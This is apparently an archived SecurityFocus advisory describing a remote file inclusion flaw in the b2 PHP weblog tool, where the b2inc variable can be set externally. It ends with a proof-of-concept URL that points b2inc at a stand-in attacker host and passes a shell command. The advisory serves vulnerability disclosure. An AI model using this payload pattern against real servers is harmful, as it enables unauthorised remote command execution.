7 lines
No EOL
699 B
Text
7 lines
No EOL
699 B
Text
source: https://www.securityfocus.com/bid/4673/info
|
|
|
|
B2 is a news/weblog tool written in php. b2 allows webmasters to quickly post news on the frontpage, and let viewers interact with each other. It is available primarily for Unix and Linux.
|
|
|
|
A variable that is referenced in the PHP scripts does not actually exist. Thus, an attacker may be able to define the value of the variable. By creating a PHP script on the remote side and embedding commands in it, the attacker is able to reference the remote file. This could potentially allow the attacker to execute commands on the vulnerable system.
|
|
|
|
http://www.vulnerablehost.com/b2/b2-include/b2edit.showposts.php?b2inc=http://www.attacker.com&cmd=ls |